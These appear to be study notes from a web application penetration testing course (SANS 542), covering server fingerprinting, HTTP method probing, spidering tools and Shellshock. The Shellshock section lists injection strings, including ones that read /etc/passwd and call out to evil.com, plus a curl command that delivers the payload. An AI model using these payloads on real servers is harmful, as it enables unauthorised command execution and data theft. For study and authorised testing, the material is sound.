SANS 542


2: Configuration, identity, authentication testing.

2.1: Nmap
2.1.1: NSE, -O (operating system) and -sV (service version) detection
2.1.2: example of scanning scanme.nmap.org
2.1.3: Server profiling: find out version of web server, ssl, load balancing, etc.
2.1.4: Finding server version through different methods
2.1.5: Nmap, use -sV (see example commands after this list)
2.1.6: Use netcat to get server connection strings, http headers
2.1.7: Netcat example of true and false server headers
2.1.8: Look up website on Netcraft
2.1.9: More in depth detail from Netcraft: headers, netblock info, ownership info
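Example commands (a rough sketch, not from the course material; scanme.nmap.org is the
Nmap project's designated test target):

# Version detection (-sV), OS detection (-O, needs root) and default NSE scripts (-sC)
sudo nmap -sV -O -sC scanme.nmap.org

# Grab the HTTP response headers / server banner manually with netcat
printf 'HEAD / HTTP/1.0\r\n\r\n' | nc scanme.nmap.org 80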

2.2: Exercise: get server info using netcat and nmap

2.3: Testing software configuration


2.3.1: Need to fingerprint web server
2.3.2: Can use HTTP methods to do this
2.3.3: Need to understand config of underlying server machine, web server daemon,
which features are available (PHP, HTTP methods accepted) and if there are default
pages
2.3.4: See what HTTP methods are accepted; interesting ones are PUT, DELETE,
CONNECT, TRACE and OPTIONS
2.3.5: Iterate through the methods with netcat, either manually or with a bash script
(see the sketch after this list)
2.3.6: Default pages can identify the server software. Docs are commonly left on
servers. Try accessing via IP address not hostname, and Nikto is good for
discovering these
2.3.7: Nikto uses a database of items to scan for on the server - server-side
scripts and programs, MD5 hashes of favicons for servers, default files - beware of
false positives
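A bash sketch of the method iteration and a Nikto run (the hostname is hypothetical,
not from the course):

# Probe which HTTP methods the server will answer; print the status line for each
for method in GET HEAD OPTIONS PUT DELETE CONNECT TRACE; do
    echo "== $method =="
    printf '%s / HTTP/1.0\r\n\r\n' "$method" | nc -w 3 target.example.com 80 | head -1
done

# Nikto scan for default files, dangerous scripts and known server fingerprints
nikto -h http://target.example.com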

2.4: Shellshock
2.4.1: Important to look for software configuration flaws, using e.g. Nikto
2.4.2: 2014 was a good year for vulns: Heartbleed, Shellshock and Drupalgeddon
2.4.3: Shellshock was due to the way Bash handled functions defined within environment
variables and exported to child processes, which would import them and run arbitrary
commands.
2.4.4: Remotely exploitable: the adversary interacts with the server, input from the
connection is used by the server in bash env variables, and the adversary controls
that input so can cause commands to be executed.
2.4.5: On the web, CGI scripts can use #!/bin/bash, and often /bin/sh is a pointer
to /bin/bash. Functions backed by popen() or system() are also vulnerable in apps
written in Python, PHP and other interpreted languages.
2.4.6: Injection strings (first two are direct injection, last two are blind injection):
() { 42;};echo;/bin/cat /etc/passwd
() { 42;};echo;/usr/bin/id
() { 42;};echo; ping -c 4 10.42.42.42
() { 42;};echo; nslookup abc123.evil.com
2.4.7: These can go in User-Agent, Cookie and Referer headers. The () { 42;} prefix
indicates a function stored in an env variable. Inside the curly braces is what the
function will do; 42 is arbitrary here as it doesn't get executed (it can just be a
colon). The echo is padding - not always necessary for shellshock, but for HTTP
headers it reduces the likelihood of a server error. The last part is the command.
2.4.8: Bash continues parsing past the ;} and executes what it finds (this is the
flaw - see the local test command after this list)
2.4.9: Visualisation of shellshock injection
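The widely published local check for the flaw (run against the bash on the machine you
want to test; a patched bash prints just "test", possibly with a warning):

# Vulnerable bash keeps parsing past the function body and runs the echo
env x='() { :;}; echo vulnerable' bash -c 'echo test'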

2.5: Exercise: Shellshock, using burp to intercept and change user-agent string.
Also use curl to set user-agent.
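A curl sketch of the same injection (the URL and CGI script name are hypothetical):

# Send the shellshock string as the User-Agent header to a CGI endpoint
curl -A '() { 42;};echo;/usr/bin/id' http://victim.example.com/cgi-bin/status.sh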
2.6: Spidering web applications.
2.6.1: Spidering is important info gathering according to OTG
2.6.2: Involves following links to download the site, then analysing it offline to find
security weaknesses in code, contact details, keywords for password guessing,
confidential data, etc.
2.6.3: Common to spider multiple times as you need a map of the site. Automated
tools may fail if the site is complex or has issues with multiple requests, so you
might have to do it manually.
2.6.4: Robots.txt can tell spiders what they're allowed to access based on user-
agent. Meta tags can also be placed on pages: the first two below stop caching (need
both as they are respected by different clients), the second two control search engine
spiders.
<meta http-equiv="pragma" content="no-cache">
<meta http-equiv="cache-control" content="no-cache">
<meta name="robots" content="index,nofollow">
<meta name="googlebot" content="noarchive">
2.6.5: ZAP can spider websites (select attack->spider). Client side dynamically
generated links can be missed, so a separate dedicated AJAX spider can be employed.
2.6.6: ZAP example.
2.6.7: Wappalyzer can provide insight into OS, web server, web apps, languages,
frameworks and APIs leveraged.
2.6.8: Wappalyzer browser extension gives icons of what stuff is in use. Beware: it
sends data back to the Wappalyzer website.
2.6.9: ZAP has a "Technology Detection" extension that implements Wappalyzer code,
but it's not release quality and doesn't implement all functionality as a browser is
required.
2.6.10: It's a marketplace extension and creates a new tab. Example illustrated.
2.6.11: ZAP forced browse, based on the (now inactive) DirBuster, does a brute force
browse using a wordlist. Can do it for a site, a directory or a directory + its
children.
2.6.12: Burp can spider similarly to ZAP: use the spider tab + "spider running", or
right-click the target and click "spider this host"
2.6.13: Can use wget: it respects robots.txt, -r will recurse through discovered links
and -l can set recursion depth (example after this list)
2.6.14: Specialized spidering tools are available; CeWL (https://digi.ninja) spiders a
site then creates a word list for dictionary attacks, and can also use EXIF data.
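Example invocations for the two command-line tools above (the target hostname and
wordlist filename are hypothetical):

# Recursive spider to depth 3; note wget honours robots.txt by default
wget -r -l 3 http://target.example.com/

# Spider to depth 2 and build a wordlist of 6+ character words for password guessing
cewl -d 2 -m 6 -w wordlist.txt http://target.example.com/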

2.7: Exercise - spidering a website with wget (compare results to an ls listing on the
server to see what is missed), ZAP, Burp (401s not visible unless you click filter
options) and CeWL
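One way to do the wget comparison (assumes shell access to the server; the host and
document root are hypothetical):

# Normalise the wget mirror (a directory named after the host) into relative paths
find target.example.com/ -type f | sed 's|^target\.example\.com/||' | sort > spidered.txt
# Take the equivalent listing on the server itself
ssh user@target.example.com 'cd /var/www/html && find . -type f | sed "s|^\./||" | sort' > on_server.txt
# Paths only in on_server.txt were missed by the spider
diff spidered.txt on_server.txt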

2.8: Analyzing spidering results.


2.8.1: After we have spidered a site, we analyze the results, looking for comments
that reveal useful or sensitive info, commented code and links, disabled
functionality, and linked servers (content or application servers).
2.8.2: HTML comments can include developer notes, explanations of functionality or
variables, and usernames/passwords. These should be moved to server-side comments
(e.g. in the PHP code).
2.8.3: Disabled functionality reveals previous or future versions of the site,
which may get invoked and contain security weaknesses, which could undermine the
whole application.
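A quick first pass over a spidered copy (directory name hypothetical):

# Hunt for HTML comments and developer leftovers in the mirrored pages
grep -rn '<!--' target.example.com/
grep -rniE 'password|todo|fixme|debug' target.example.com/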
2.8.4:
